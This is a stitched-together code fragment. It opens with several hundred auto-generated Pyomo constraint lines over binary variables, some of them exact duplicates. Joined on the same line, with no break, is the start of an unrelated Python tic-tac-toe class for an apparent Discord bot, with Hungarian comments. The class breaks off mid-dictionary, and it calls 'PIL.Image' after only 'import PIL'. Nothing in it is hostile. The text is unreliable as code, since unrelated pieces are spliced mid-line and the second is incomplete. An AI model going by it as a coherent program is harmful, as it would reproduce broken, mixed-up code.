= Constraint(expr= m.b1554 - m.b1555 <= 0) m.c2528 = Constraint(expr= m.b1556 - m.b1557 <= 0) m.c2529 = Constraint(expr= m.b1556 - m.b1558 <= 0) m.c2530 = Constraint(expr= m.b1557 - m.b1558 <= 0) m.c2531 = Constraint(expr= m.b1559 - m.b1560 <= 0) m.c2532 = Constraint(expr= m.b1559 - m.b1561 <= 0) m.c2533 = Constraint(expr= m.b1560 - m.b1561 <= 0) m.c2534 = Constraint(expr= m.b1562 - m.b1563 <= 0) m.c2535 = Constraint(expr= m.b1562 - m.b1564 <= 0) m.c2536 = Constraint(expr= m.b1563 - m.b1564 <= 0) m.c2537 = Constraint(expr= m.b1565 - m.b1566 <= 0) m.c2538 = Constraint(expr= m.b1565 - m.b1567 <= 0) m.c2539 = Constraint(expr= m.b1566 - m.b1567 <= 0) m.c2540 = Constraint(expr= m.b1568 - m.b1569 <= 0) m.c2541 = Constraint(expr= m.b1568 - m.b1570 <= 0) m.c2542 = Constraint(expr= m.b1569 - m.b1570 <= 0) m.c2543 = Constraint(expr= m.b1571 - m.b1572 <= 0) m.c2544 = Constraint(expr= m.b1571 - m.b1573 <= 0) m.c2545 = Constraint(expr= m.b1572 - m.b1573 <= 0) m.c2546 = Constraint(expr= m.b1574 - m.b1575 <= 0) m.c2547 = Constraint(expr= m.b1574 - m.b1576 <= 0) m.c2548 = Constraint(expr= m.b1575 - m.b1576 <= 0) m.c2549 = Constraint(expr= m.b1577 - m.b1578 <= 0) m.c2550 = Constraint(expr= m.b1577 - m.b1579 <= 0) m.c2551 = Constraint(expr= m.b1578 - m.b1579 <= 0) m.c2552 = Constraint(expr= m.b1580 + m.b1581 <= 1) m.c2553 = Constraint(expr= m.b1580 + m.b1582 <= 1) m.c2554 = Constraint(expr= m.b1580 + m.b1581 <= 1) m.c2555 = Constraint(expr= m.b1581 + m.b1582 <= 1) m.c2556 = Constraint(expr= m.b1580 + m.b1582 <= 1) m.c2557 = Constraint(expr= m.b1581 + m.b1582 <= 1) m.c2558 = Constraint(expr= m.b1583 + m.b1584 <= 1) m.c2559 = Constraint(expr= m.b1583 + m.b1585 <= 1) m.c2560 = Constraint(expr= m.b1583 + m.b1584 <= 1) m.c2561 = Constraint(expr= m.b1584 + m.b1585 <= 1) m.c2562 = Constraint(expr= m.b1583 + m.b1585 <= 1) m.c2563 = Constraint(expr= m.b1584 + m.b1585 <= 1) m.c2564 = Constraint(expr= m.b1586 + m.b1587 <= 1) m.c2565 = Constraint(expr= m.b1586 + m.b1588 <= 1) m.c2566 = Constraint(expr= m.b1586 + m.b1587 <= 1) m.c2567 = Constraint(expr= m.b1587 + m.b1588 <= 1) m.c2568 = Constraint(expr= m.b1586 + m.b1588 <= 1) m.c2569 = Constraint(expr= m.b1587 + m.b1588 <= 1) m.c2570 = Constraint(expr= m.b1589 + m.b1590 <= 1) m.c2571 = Constraint(expr= m.b1589 + m.b1591 <= 1) m.c2572 = Constraint(expr= m.b1589 + m.b1590 <= 1) m.c2573 = Constraint(expr= m.b1590 + m.b1591 <= 1) m.c2574 = Constraint(expr= m.b1589 + m.b1591 <= 1) m.c2575 = Constraint(expr= m.b1590 + m.b1591 <= 1) m.c2576 = Constraint(expr= m.b1592 + m.b1593 <= 1) m.c2577 = Constraint(expr= m.b1592 + m.b1594 <= 1) m.c2578 = Constraint(expr= m.b1592 + m.b1593 <= 1) m.c2579 = Constraint(expr= m.b1593 + m.b1594 <= 1) m.c2580 = Constraint(expr= m.b1592 + m.b1594 <= 1) m.c2581 = Constraint(expr= m.b1593 + m.b1594 <= 1) m.c2582 = Constraint(expr= m.b1595 + m.b1596 <= 1) m.c2583 = Constraint(expr= m.b1595 + m.b1597 <= 1) m.c2584 = Constraint(expr= m.b1595 + m.b1596 <= 1) m.c2585 = Constraint(expr= m.b1596 + m.b1597 <= 1) m.c2586 = Constraint(expr= m.b1595 + m.b1597 <= 1) m.c2587 = Constraint(expr= m.b1596 + m.b1597 <= 1) m.c2588 = Constraint(expr= m.b1598 + m.b1599 <= 1) m.c2589 = Constraint(expr= m.b1598 + m.b1600 <= 1) m.c2590 = Constraint(expr= m.b1598 + m.b1599 <= 1) m.c2591 = Constraint(expr= m.b1599 + m.b1600 <= 1) m.c2592 = Constraint(expr= m.b1598 + m.b1600 <= 1) m.c2593 = Constraint(expr= m.b1599 + m.b1600 <= 1) m.c2594 = Constraint(expr= m.b1601 + m.b1602 <= 1) m.c2595 = Constraint(expr= m.b1601 + m.b1603 <= 1) m.c2596 = Constraint(expr= m.b1601 + m.b1602 <= 1) m.c2597 = Constraint(expr= m.b1602 + m.b1603 <= 1) m.c2598 = Constraint(expr= m.b1601 + m.b1603 <= 1) m.c2599 = Constraint(expr= m.b1602 + m.b1603 <= 1) m.c2600 = Constraint(expr= m.b1604 + m.b1605 <= 1) m.c2601 = Constraint(expr= m.b1604 + m.b1606 <= 1) m.c2602 = Constraint(expr= m.b1604 + m.b1605 <= 1) m.c2603 = Constraint(expr= m.b1605 + m.b1606 <= 1) m.c2604 = Constraint(expr= m.b1604 + m.b1606 <= 1) m.c2605 = Constraint(expr= m.b1605 + m.b1606 <= 1) m.c2606 = Constraint(expr= m.b1607 + m.b1608 <= 1) m.c2607 = Constraint(expr= m.b1607 + m.b1609 <= 1) m.c2608 = Constraint(expr= m.b1607 + m.b1608 <= 1) m.c2609 = Constraint(expr= m.b1608 + m.b1609 <= 1) m.c2610 = Constraint(expr= m.b1607 + m.b1609 <= 1) m.c2611 = Constraint(expr= m.b1608 + m.b1609 <= 1) m.c2612 = Constraint(expr= m.b1610 + m.b1611 <= 1) m.c2613 = Constraint(expr= m.b1610 + m.b1612 <= 1) m.c2614 = Constraint(expr= m.b1610 + m.b1611 <= 1) m.c2615 = Constraint(expr= m.b1611 + m.b1612 <= 1) m.c2616 = Constraint(expr= m.b1610 + m.b1612 <= 1) m.c2617 = Constraint(expr= m.b1611 + m.b1612 <= 1) m.c2618 = Constraint(expr= m.b1613 + m.b1614 <= 1) m.c2619 = Constraint(expr= m.b1613 + m.b1615 <= 1) m.c2620 = Constraint(expr= m.b1613 + m.b1614 <= 1) m.c2621 = Constraint(expr= m.b1614 + m.b1615 <= 1) m.c2622 = Constraint(expr= m.b1613 + m.b1615 <= 1) m.c2623 = Constraint(expr= m.b1614 + m.b1615 <= 1) m.c2624 = Constraint(expr= m.b1616 + m.b1617 <= 1) m.c2625 = Constraint(expr= m.b1616 + m.b1618 <= 1) m.c2626 = Constraint(expr= m.b1616 + m.b1617 <= 1) m.c2627 = Constraint(expr= m.b1617 + m.b1618 <= 1) m.c2628 = Constraint(expr= m.b1616 + m.b1618 <= 1) m.c2629 = Constraint(expr= m.b1617 + m.b1618 <= 1) m.c2630 = Constraint(expr= m.b1619 + m.b1620 <= 1) m.c2631 = Constraint(expr= m.b1619 + m.b1621 <= 1) m.c2632 = Constraint(expr= m.b1619 + m.b1620 <= 1) m.c2633 = Constraint(expr= m.b1620 + m.b1621 <= 1) m.c2634 = Constraint(expr= m.b1619 + m.b1621 <= 1) m.c2635 = Constraint(expr= m.b1620 + m.b1621 <= 1) m.c2636 = Constraint(expr= m.b1622 + m.b1623 <= 1) m.c2637 = Constraint(expr= m.b1622 + m.b1624 <= 1) m.c2638 = Constraint(expr= m.b1622 + m.b1623 <= 1) m.c2639 = Constraint(expr= m.b1623 + m.b1624 <= 1) m.c2640 = Constraint(expr= m.b1622 + m.b1624 <= 1) m.c2641 = Constraint(expr= m.b1623 + m.b1624 <= 1) m.c2642 = Constraint(expr= m.b1625 + m.b1626 <= 1) m.c2643 = Constraint(expr= m.b1625 + m.b1627 <= 1) m.c2644 = Constraint(expr= m.b1625 + m.b1626 <= 1) m.c2645 = Constraint(expr= m.b1626 + m.b1627 <= 1) m.c2646 = Constraint(expr= m.b1625 + m.b1627 <= 1) m.c2647 = Constraint(expr= m.b1626 + m.b1627 <= 1) m.c2648 = Constraint(expr= m.b1628 + m.b1629 <= 1) m.c2649 = Constraint(expr= m.b1628 + m.b1630 <= 1) m.c2650 = Constraint(expr= m.b1628 + m.b1629 <= 1) m.c2651 = Constraint(expr= m.b1629 + m.b1630 <= 1) m.c2652 = Constraint(expr= m.b1628 + m.b1630 <= 1) m.c2653 = Constraint(expr= m.b1629 + m.b1630 <= 1) m.c2654 = Constraint(expr= m.b1631 + m.b1632 <= 1) m.c2655 = Constraint(expr= m.b1631 + m.b1633 <= 1) m.c2656 = Constraint(expr= m.b1631 + m.b1632 <= 1) m.c2657 = Constraint(expr= m.b1632 + m.b1633 <= 1) m.c2658 = Constraint(expr= m.b1631 + m.b1633 <= 1) m.c2659 = Constraint(expr= m.b1632 + m.b1633 <= 1) m.c2660 = Constraint(expr= m.b1634 + m.b1635 <= 1) m.c2661 = Constraint(expr= m.b1634 + m.b1636 <= 1) m.c2662 = Constraint(expr= m.b1634 + m.b1635 <= 1) m.c2663 = Constraint(expr= m.b1635 + m.b1636 <= 1) m.c2664 = Constraint(expr= m.b1634 + m.b1636 <= 1) m.c2665 = Constraint(expr= m.b1635 + m.b1636 <= 1) m.c2666 = Constraint(expr= m.b1637 + m.b1638 <= 1) m.c2667 = Constraint(expr= m.b1637 + m.b1639 <= 1) m.c2668 = Constraint(expr= m.b1637 + m.b1638 <= 1) m.c2669 = Constraint(expr= m.b1638 + m.b1639 <= 1) m.c2670 = Constraint(expr= m.b1637 + m.b1639 <= 1) m.c2671 = Constraint(expr= m.b1638 + m.b1639 <= 1) m.c2672 = Constraint(expr= m.b1640 + m.b1641 <= 1) m.c2673 = Constraint(expr= m.b1640 + m.b1642 <= 1) m.c2674 = Constraint(expr= m.b1640 + m.b1641 <= 1) m.c2675 = Constraint(expr= m.b1641 + m.b1642 <= 1) m.c2676 = Constraint(expr= m.b1640 + m.b1642 <= 1) m.c2677 = Constraint(expr= m.b1641 + m.b1642 <= 1) m.c2678 = Constraint(expr= m.b1643 + m.b1644 <= 1) m.c2679 = Constraint(expr= m.b1643 + m.b1645 <= 1) m.c2680 = Constraint(expr= m.b1643 + m.b1644 <= 1) m.c2681 = Constraint(expr= m.b1644 + m.b1645 <= 1) m.c2682 = Constraint(expr= m.b1643 + m.b1645 <= 1) m.c2683 = Constraint(expr= m.b1644 + m.b1645 <= 1) m.c2684 = Constraint(expr= m.b1646 + m.b1647 <= 1) m.c2685 = Constraint(expr= m.b1646 + m.b1648 <= 1) m.c2686 = Constraint(expr= m.b1646 + m.b1647 <= 1) m.c2687 = Constraint(expr= m.b1647 + m.b1648 <= 1) m.c2688 = Constraint(expr= m.b1646 + m.b1648 <= 1) m.c2689 = Constraint(expr= m.b1647 + m.b1648 <= 1) m.c2690 = Constraint(expr= m.b1649 + m.b1650 <= 1) m.c2691 = Constraint(expr= m.b1649 + m.b1651 <= 1) m.c2692 = Constraint(expr= m.b1649 + m.b1650 <= 1) m.c2693 = Constraint(expr= m.b1650 + m.b1651 <= 1) m.c2694 = Constraint(expr= m.b1649 + m.b1651 <= 1) m.c2695 = Constraint(expr= m.b1650 + m.b1651 <= 1) m.c2696 = Constraint(expr= m.b1652 + m.b1653 <= 1) m.c2697 = Constraint(expr= m.b1652 + m.b1654 <= 1) m.c2698 = Constraint(expr= m.b1652 + m.b1653 <= 1) m.c2699 = Constraint(expr= m.b1653 + m.b1654 <= 1) m.c2700 = Constraint(expr= m.b1652 + m.b1654 <= 1) m.c2701 = Constraint(expr= m.b1653 + m.b1654 <= 1) m.c2702 = Constraint(expr= m.b1655 + m.b1656 <= 1) m.c2703 = Constraint(expr= m.b1655 + m.b1657 <= 1) m.c2704 = Constraint(expr= m.b1655 + m.b1656 <= 1) m.c2705 = Constraint(expr= m.b1656 + m.b1657 <= 1) m.c2706 = Constraint(expr= m.b1655 + m.b1657 <= 1) m.c2707 = Constraint(expr= m.b1656 + m.b1657 <= 1) m.c2708 = Constraint(expr= m.b1658 + m.b1659 <= 1) m.c2709 = Constraint(expr= m.b1658 + m.b1660 <= 1) m.c2710 = Constraint(expr= m.b1658 + m.b1659 <= 1) m.c2711 = Constraint(expr= m.b1659 + m.b1660 <= 1) m.c2712 = Constraint(expr= m.b1658 + m.b1660 <= 1) m.c2713 = Constraint(expr= m.b1659 + m.b1660 <= 1) m.c2714 = Constraint(expr= m.b1661 + m.b1662 <= 1) m.c2715 = Constraint(expr= m.b1661 + m.b1663 <= 1) m.c2716 = Constraint(expr= m.b1661 + m.b1662 <= 1) m.c2717 = Constraint(expr= m.b1662 + m.b1663 <= 1) m.c2718 = Constraint(expr= m.b1661 + m.b1663 <= 1) m.c2719 = Constraint(expr= m.b1662 + m.b1663 <= 1) m.c2720 = Constraint(expr= m.b1664 + m.b1665 <= 1) m.c2721 = Constraint(expr= m.b1664 + m.b1666 <= 1) m.c2722 = Constraint(expr= m.b1664 + m.b1665 <= 1) m.c2723 = Constraint(expr= m.b1665 + m.b1666 <= 1) m.c2724 = Constraint(expr= m.b1664 + m.b1666 <= 1) m.c2725 = Constraint(expr= m.b1665 + m.b1666 <= 1) m.c2726 = Constraint(expr= m.b1667 + m.b1668 <= 1) m.c2727 = Constraint(expr= m.b1667 + m.b1669 <= 1) m.c2728 = Constraint(expr= m.b1667 + m.b1668 <= 1) m.c2729 = Constraint(expr= m.b1668 + m.b1669 <= 1) m.c2730 = Constraint(expr= m.b1667 + m.b1669 <= 1) m.c2731 = Constraint(expr= m.b1668 + m.b1669 <= 1) m.c2732 = Constraint(expr= m.b1490 - m.b1580 <= 0) m.c2733 = Constraint(expr= - m.b1490 + m.b1491 - m.b1581 <= 0) m.c2734 = Constraint(expr= - m.b1490 - m.b1491 + m.b1492 - m.b1582 <= 0) m.c2735 = Constraint(expr= m.b1493 - m.b1583 <= 0) m.c2736 = Constraint(expr= - m.b1493 + m.b1494 - m.b1584 <= 0) m.c2737 = Constraint(expr= - m.b1493 - m.b1494 + m.b1495 - m.b1585 <= 0) m.c2738 = Constraint(expr= m.b1496 - m.b1586 <= 0) m.c2739 = Constraint(expr= - m.b1496 + m.b1497 - m.b1587 <= 0) m.c2740 = Constraint(expr= - m.b1496 - m.b1497 + m.b1498 - m.b1588 <= 0) m.c2741 = Constraint(expr= m.b1499 - m.b1589 <= 0) m.c2742 = Constraint(expr= - m.b1499 + m.b1500 - m.b1590 <= 0) m.c2743 = Constraint(expr= - m.b1499 - m.b1500 + m.b1501 - m.b1591 <= 0) m.c2744 = Constraint(expr= m.b1502 - m.b1592 <= 0) m.c2745 = Constraint(expr= - m.b1502 + m.b1503 - m.b1593 <= 0) m.c2746 = Constraint(expr= - m.b1502 - m.b1503 + m.b1504 - m.b1594 <= 0) m.c2747 = Constraint(expr= m.b1505 - m.b1595 <= 0) m.c2748 = Constraint(expr= - m.b1505 + m.b1506 - m.b1596 <= 0) m.c2749 = Constraint(expr= - m.b1505 - m.b1506 + m.b1507 - m.b1597 <= 0) m.c2750 = Constraint(expr= m.b1508 - m.b1598 <= 0) m.c2751 = Constraint(expr= - m.b1508 + m.b1509 - m.b1599 <= 0) m.c2752 = Constraint(expr= - m.b1508 - m.b1509 + m.b1510 - m.b1600 <= 0) m.c2753 = Constraint(expr= m.b1511 - m.b1601 <= 0) m.c2754 = Constraint(expr= - m.b1511 + m.b1512 - m.b1602 <= 0) m.c2755 = Constraint(expr= - m.b1511 - m.b1512 + m.b1513 - m.b1603 <= 0) m.c2756 = Constraint(expr= m.b1514 - m.b1604 <= 0) m.c2757 = Constraint(expr= - m.b1514 + m.b1515 - m.b1605 <= 0) m.c2758 = Constraint(expr= - m.b1514 - m.b1515 + m.b1516 - m.b1606 <= 0) m.c2759 = Constraint(expr= m.b1517 - m.b1607 <= 0) m.c2760 = Constraint(expr= - m.b1517 + m.b1518 - m.b1608 <= 0) m.c2761 = Constraint(expr= - m.b1517 - m.b1518 + m.b1519 - m.b1609 <= 0) m.c2762 = Constraint(expr= m.b1520 - m.b1610 <= 0) m.c2763 = Constraint(expr= - m.b1520 + m.b1521 - m.b1611 <= 0) m.c2764 = Constraint(expr= - m.b1520 - m.b1521 + m.b1522 - m.b1612 <= 0) m.c2765 = Constraint(expr= m.b1523 - m.b1613 <= 0) m.c2766 = Constraint(expr= - m.b1523 + m.b1524 - m.b1614 <= 0) m.c2767 = Constraint(expr= - m.b1523 - m.b1524 + m.b1525 - m.b1615 <= 0) m.c2768 = Constraint(expr= m.b1526 - m.b1616 <= 0) m.c2769 = Constraint(expr= - m.b1526 + m.b1527 - m.b1617 <= 0) m.c2770 = Constraint(expr= - m.b1526 - m.b1527 + m.b1528 - m.b1618 <= 0) m.c2771 = Constraint(expr= m.b1529 - m.b1619 <= 0) m.c2772 = Constraint(expr= - m.b1529 + m.b1530 - m.b1620 <= 0) m.c2773 = Constraint(expr= - m.b1529 - m.b1530 + m.b1531 - m.b1621 <= 0) m.c2774 = Constraint(expr= m.b1532 - m.b1622 <= 0) m.c2775 = Constraint(expr= - m.b1532 + m.b1533 - m.b1623 <= 0) m.c2776 = Constraint(expr= - m.b1532 - m.b1533 + m.b1534 - m.b1624 <= 0) m.c2777 = Constraint(expr= m.b1535 - m.b1625 <= 0) m.c2778 = Constraint(expr= - m.b1535 + m.b1536 - m.b1626 <= 0) m.c2779 = Constraint(expr= - m.b1535 - m.b1536 + m.b1537 - m.b1627 <= 0) m.c2780 = Constraint(expr= m.b1538 - m.b1628 <= 0) m.c2781 = Constraint(expr= - m.b1538 + m.b1539 - m.b1629 <= 0) m.c2782 = Constraint(expr= - m.b1538 - m.b1539 + m.b1540 - m.b1630 <= 0) m.c2783 = Constraint(expr= m.b1541 - m.b1631 <= 0) m.c2784 = Constraint(expr= - m.b1541 + m.b1542 - m.b1632 <= 0) m.c2785 = Constraint(expr= - m.b1541 - m.b1542 + m.b1543 - m.b1633 <= 0) m.c2786 = Constraint(expr= m.b1544 - m.b1634 <= 0) m.c2787 = Constraint(expr= - m.b1544 + m.b1545 - m.b1635 <= 0) m.c2788 = Constraint(expr= - m.b1544 - m.b1545 + m.b1546 - m.b1636 <= 0) m.c2789 = Constraint(expr= m.b1547 - m.b1637 <= 0) m.c2790 = Constraint(expr= - m.b1547 + m.b1548 - m.b1638 <= 0) m.c2791 = Constraint(expr= - m.b1547 - m.b1548 + m.b1549 - m.b1639 <= 0) m.c2792 = Constraint(expr= m.b1550 - m.b1640 <= 0) m.c2793 = Constraint(expr= - m.b1550 + m.b1551 - m.b1641 <= 0) m.c2794 = Constraint(expr= - m.b1550 - m.b1551 + m.b1552 - m.b1642 <= 0) m.c2795 = Constraint(expr= m.b1553 - m.b1643 <= 0) m.c2796 = Constraint(expr= - m.b1553 + m.b1554 - m.b1644 <= 0) m.c2797 = Constraint(expr= - m.b1553 - m.b1554 + m.b1555 - m.b1645 <= 0) m.c2798 = Constraint(expr= m.b1556 - m.b1646 <= 0) m.c2799 = Constraint(expr= - m.b1556 + m.b1557 - m.b1647 <= 0) m.c2800 = Constraint(expr= - m.b1556 - m.b1557 + m.b1558 - m.b1648 <= 0) m.c2801 = Constraint(expr= m.b1559 - m.b1649 <= 0) m.c2802 = Constraint(expr= - m.b1559 + m.b1560 - m.b1650 <= 0) m.c2803 = Constraint(expr= - m.b1559 - m.b1560 + m.b1561 - m.b1651 <= 0) m.c2804 = Constraint(expr= m.b1562 - m.b1652 <= 0) m.c2805 = Constraint(expr= - m.b1562 + m.b1563 - m.b1653 <= 0) m.c2806 = Constraint(expr= - m.b1562 - m.b1563 + m.b1564 - m.b1654 <= 0) m.c2807 = Constraint(expr= m.b1565 - m.b1655 <= 0) m.c2808 = Constraint(expr= - m.b1565 + m.b1566 - m.b1656 <= 0) m.c2809 = Constraint(expr= - m.b1565 - m.b1566 + m.b1567 - m.b1657 <= 0) m.c2810 = Constraint(expr= m.b1568 - m.b1658 <= 0) m.c2811 = Constraint(expr= - m.b1568 + m.b1569 - m.b1659 <= 0) m.c2812 = Constraint(expr= - m.b1568 - m.b1569 + m.b1570 - m.b1660 <= 0) m.c2813 = Constraint(expr= m.b1571 - m.b1661 <= 0) m.c2814 = Constraint(expr= - m.b1571 + m.b1572 - m.b1662 <= 0) m.c2815 = Constraint(expr= - m.b1571 - m.b1572 + m.b1573 - m.b1663 <= 0) m.c2816 = Constraint(expr= m.b1574 - m.b1664 <= 0) m.c2817 = Constraint(expr= - m.b1574 + m.b1575 - m.b1665 <= 0) m.c2818 = Constraint(expr= - m.b1574 - m.b1575 + m.b1576 - m.b1666 <= 0) m.c2819 = Constraint(expr= m.b1577 - m.b1667 <= 0) m.c2820 = Constraint(expr= - m.b1577 + m.b1578 - m.b1668 <= 0) m.c2821 = Constraint(expr= - m.b1577 - m.b1578 + m.b1579 - m.b1669 <= 0) m.c2822 = Constraint(expr= m.b1490 + m.b1493 == 1) m.c2823 = Constraint(expr= m.b1491 + m.b1494 == 1) m.c2824 = Constraint(expr= m.b1492 + m.b1495 == 1) m.c2825 = Constraint(expr= - m.b1496 + m.b1505 + m.b1508 >= 0) m.c2826 = Constraint(expr= - m.b1497 + m.b1506 + m.b1509 >= 0) m.c2827 = Constraint(expr= - m.b1498 + m.b1507 + m.b1510 >= 0) m.c2828 = Constraint(expr= - m.b1505 + m.b1523 >= 0) m.c2829 = Constraint(expr= - m.b1506 + m.b1524 >= 0) m.c2830 = Constraint(expr= - m.b1507 + m.b1525 >= 0) m.c2831 = Constraint(expr= - m.b1508 + m.b1526 >= 0) m.c2832 = Constraint(expr= - m.b1509 + m.b1527 >= 0) m.c2833 = Constraint(expr= - m.b1510 + m.b1528 >= 0) m.c2834 = Constraint(expr= - m.b1499 + m.b1511 >= 0) m.c2835 = Constraint(expr= - m.b1500 + m.b1512 >= 0) m.c2836 = Constraint(expr= - m.b1501 + m.b1513 >= 0) m.c2837 = Constraint(expr= - m.b1511 + m.b1529 + m.b1532 >= 0) m.c2838 = Constraint(expr= - m.b1512 + m.b1530 + m.b1533 >= 0) m.c2839 = Constraint(expr= - m.b1513 + m.b1531 + m.b1534 >= 0) m.c2840 = Constraint(expr= - m.b1502 + m.b1514 + m.b1517 + m.b1520 >= 0) m.c2841 = Constraint(expr= - m.b1503 + m.b1515 + m.b1518 + m.b1521 >= 0) m.c2842 = Constraint(expr= - m.b1504 + m.b1516 + m.b1519 + m.b1522 >= 0) m.c2843 = Constraint(expr= - m.b1514 + m.b1532 >= 0) m.c2844 = Constraint(expr= - m.b1515 + m.b1533 >= 0) m.c2845 = Constraint(expr= - m.b1516 + m.b1534 >= 0) m.c2846 = Constraint(expr= - m.b1517 + m.b1535 + m.b1538 >= 0) m.c2847 = Constraint(expr= - m.b1518 + m.b1536 + m.b1539 >= 0) m.c2848 = Constraint(expr= - m.b1519 + m.b1537 + m.b1540 >= 0) m.c2849 = Constraint(expr= - m.b1520 + m.b1541 + m.b1544 + m.b1547 >= 0) m.c2850 = Constraint(expr= - m.b1521 + m.b1542 + m.b1545 + m.b1548 >= 0) m.c2851 = Constraint(expr= - m.b1522 + m.b1543 + m.b1546 + m.b1549 >= 0) m.c2852 = Constraint(expr= m.b1490 + m.b1493 - m.b1496 >= 0) m.c2853 = Constraint(expr= m.b1491 + m.b1494 - m.b1497 >= 0) m.c2854 = Constraint(expr= m.b1492 + m.b1495 - m.b1498 >= 0) m.c2855 = Constraint(expr= m.b1490 + m.b1493 - m.b1499 >= 0) m.c2856 = Constraint(expr= m.b1491 + m.b1494 - m.b1500 >= 0) m.c2857 = Constraint(expr= m.b1492 + m.b1495 - m.b1501 >= 0) m.c2858 = Constraint(expr= m.b1490 + m.b1493 - m.b1502 >= 0) m.c2859 = Constraint(expr= m.b1491 + m.b1494 - m.b1503 >= 0) m.c2860 = Constraint(expr= m.b1492 + m.b1495 - m.b1504 >= 0) m.c2861 = Constraint(expr= m.b1496 - m.b1505 >= 0) m.c2862 = Constraint(expr= m.b1497 - m.b1506 >= 0) m.c2863 = Constraint(expr= m.b1498 - m.b1507 >= 0) m.c2864 = Constraint(expr= m.b1496 - m.b1508 >= 0) m.c2865 = Constraint(expr= m.b1497 - m.b1509 >= 0) m.c2866 = Constraint(expr= m.b1498 - m.b1510 >= 0) m.c2867 = Constraint(expr= m.b1499 - m.b1511 >= 0) m.c2868 = Constraint(expr= m.b1500 - m.b1512 >= 0) m.c2869 = Constraint(expr= m.b1501 - m.b1513 >= 0) m.c2870 = Constraint(expr= m.b1502 - m.b1514 >= 0) m.c2871 = Constraint(expr= m.b1503 - m.b1515 >= 0) m.c2872 = Constraint(expr= m.b1504 - m.b1516 >= 0) m.c2873 = Constraint(expr= m.b1502 - m.b1517 >= 0) m.c2874 = Constraint(expr= m.b1503 - m.b1518 >= 0) m.c2875 = Constraint(expr= m.b1504 - m.b1519 >= 0) m.c2876 = Constraint(expr= m.b1502 - m.b1520 >= 0) m.c2877 = Constraint(expr= m.b1503 - m.b1521 >= 0) m.c2878 = Constraint(expr= m.b1504 - m.b1522 >= 0) m.c2879 = Constraint(expr= m.b1505 - m.b1523 >= 0) m.c2880 = Constraint(expr= m.b1506 - m.b1524 >= 0) m.c2881 = Constraint(expr= m.b1507 - m.b1525 >= 0) m.c2882 = Constraint(expr= m.b1508 - m.b1526 >= 0) m.c2883 = Constraint(expr= m.b1509 - m.b1527 >= 0) m.c2884 = Constraint(expr= m.b1510 - m.b1528 >= 0) m.c2885 = Constraint(expr= m.b1511 - m.b1529 >= 0) m.c2886 = Constraint(expr= m.b1512 - m.b1530 >= 0) m.c2887 = Constraint(expr= m.b1513 - m.b1531 >= 0) m.c2888 = Constraint(expr= m.b1511 - m.b1532 >= 0) m.c2889 = Constraint(expr= m.b1512 - m.b1533 >= 0) m.c2890 = Constraint(expr= m.b1513 - m.b1534 >= 0) m.c2891 = Constraint(expr= m.b1517 - m.b1535 >= 0) m.c2892 = Constraint(expr= m.b1518 - m.b1536 >= 0) m.c2893 = Constraint(expr= m.b1519 - m.b1537 >= 0) m.c2894 = Constraint(expr= m.b1517 - m.b1538 >= 0) m.c2895 = Constraint(expr= m.b1518 - m.b1539 >= 0) m.c2896 = Constraint(expr= m.b1519 - m.b1540 >= 0) m.c2897 = Constraint(expr= m.b1520 - m.b1541 >= 0) m.c2898 = Constraint(expr= m.b1521 - m.b1542 >= 0) m.c2899 = Constraint(expr= m.b1522 - m.b1543 >= 0) m.c2900 = Constraint(expr= m.b1520 - m.b1544 >= 0) m.c2901 = Constraint(expr= m.b1521 - m.b1545 >= 0) m.c2902 = Constraint(expr= m.b1522 - m.b1546 >= 0) m.c2903 = Constraint(expr= m.b1520 - m.b1547 >= 0) m.c2904 = Constraint(expr= m.b1521 - m.b1548 >= 0) m.c2905 = Constraint(expr= m.b1522 - m.b1549 >= 0) m.c2906 = Constraint(expr= - m.b1547 + m.b1550 + m.b1553 >= 0) m.c2907 = Constraint(expr= - m.b1548 + m.b1551 + m.b1554 >= 0) m.c2908 = Constraint(expr= - m.b1549 + m.b1552 + m.b1555 >= 0) m.c2909 = Constraint(expr= - m.b1556 + m.b1565 + m.b1568 >= 0) m.c2910 = Constraint(expr= - m.b1557 + m.b1566 + m.b1569 >= 0) m.c2911 = Constraint(expr= - m.b1558 + m.b1567 + m.b1570 >= 0) m.c2912 = Constraint(expr= - m.b1559 + m.b1571 >= 0) m.c2913 = Constraint(expr= - m.b1560 + m.b1572 >= 0) m.c2914 = Constraint(expr= - m.b1561 + m.b1573 >= 0) m.c2915 = Constraint(expr= m.b1547 - m.b1550 >= 0) m.c2916 = Constraint(expr= m.b1548 - m.b1551 >= 0) m.c2917 = Constraint(expr= m.b1549 - m.b1552 >= 0) m.c2918 = Constraint(expr= m.b1547 - m.b1553 >= 0) m.c2919 = Constraint(expr= m.b1548 - m.b1554 >= 0) m.c2920 = Constraint(expr= m.b1549 - m.b1555 >= 0) m.c2921 = Constraint(expr= m.b1556 - m.b1565 >= 0) m.c2922 = Constraint(expr= m.b1557 - m.b1566 >= 0) m.c2923 = Constraint(expr= m.b1558 - m.b1567 >= 0) m.c2924 = Constraint(expr= m.b1556 - m.b1568 >= 0) m.c2925 = Constraint(expr= m.b1557 - m.b1569 >= 0) m.c2926 = Constraint(expr= m.b1558 - m.b1570 >= 0) m.c2927 = Constraint(expr= m.b1559 - m.b1571 >= 0) m.c2928 = Constraint(expr= m.b1560 - m.b1572 >= 0) m.c2929 = Constraint(expr= m.b1561 - m.b1573 >= 0) m.c2930 = Constraint(expr= m.b1562 - m.b1574 >= 0) m.c2931 = Constraint(expr= m.b1563 - m.b1575 >= 0) m.c2932 = Constraint(expr= m.b1564 - m.b1576 >= 0) m.c2933 = Constraint(expr= m.b1562 - m.b1577 >= 0) m.c2934 = Constraint(expr= m.b1563 - m.b1578 >= 0) m.c2935 = Constraint(expr= m.b1564 - m.b1579 >= 0)
import PIL, random, os, shutil class Winner(Exception): pass class Tie(Exception): pass class InvalidMove(Exception): pass class TicTacToe: def __init__(self, player1, player2): # Készítsen másolatot a mezőről a cache mappába, # majd megnyitjuk módosításra self.file = f"cache/ttt_{player1.guild.id}.png" shutil.copy("assets/tictactoe/grid.png", self.file) self.image = PIL.Image.open(self.file) # Válasszon véletlenszerűen ki kapja a karaktert és ki következik self.turn = random.choice(["x","o"]) if bool(random.getrandbits(1)): self.players = {"x": player1, "o": player2} else: self.players = {"o": player1, "x": player2} # Mezők számoláshoz self.fields = ["","","","","","","","",""] def __del__(self): # Zárja le a képet, majd törölje azt a cache mappából self.image.close() try: os.remove(self.file) except PermissionError: print(f"Nem lehetett eltávolítani a {self.file}.") def is_board_full(self): return "" not in self.fields def is_field_free(self, field): return self.fields[field] == "" def move(self, field): if (0 <= field <= 8) and self.is_field_free(field): # Helyezze le a jelet self.fields[field] = self.turn # Kiderítjük hogy nyert-e a menet f, p = self.is_winner(self.fields, self.turn) # Tegye a jelet is a képre poses = { 0: 